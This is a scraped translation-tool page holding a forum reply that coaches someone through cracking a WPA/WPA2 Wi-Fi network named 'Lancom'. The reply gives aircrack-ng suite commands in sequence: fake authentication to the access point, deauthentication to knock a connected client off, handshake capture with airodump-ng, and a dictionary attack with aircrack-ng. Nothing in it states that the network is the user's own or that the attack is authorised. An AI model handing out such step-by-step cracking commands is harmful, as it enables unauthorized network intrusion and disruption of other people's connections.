Results (
Vietnamese) 1:
[Copy]Copied!
Ok, I'm assuming you're trying to attack aWPA or WPA2 network. Your command,Code: [View] aireplay-ng -1 0 -a 00:07:D5:01:31:2A -h00:c0:ca:72:75:d3 -e Lancom mon0means that you are trying to associate withthe AP, which is only necessary for crackingWEP (and also WPS).To get a handshake, you want to deauth a clent. Try running this:Code: [View] aireplay-ng -0 10 -a (access point mac) -c(client mac) -e Lancom mon0This attack means that there needs to be aclient on the network that you can kick off.To see any clients connected, runCode: [View] airodump-ng --bssid 00:07:D5:01:31:2Amon0 -w LancomYou should always run that command beforeyou try to capture a handshake.After you get the handshake, runCode: [View] aircrack-ng Lancom*.cap -w (path to yourdictionary)
Being translated, please wait..
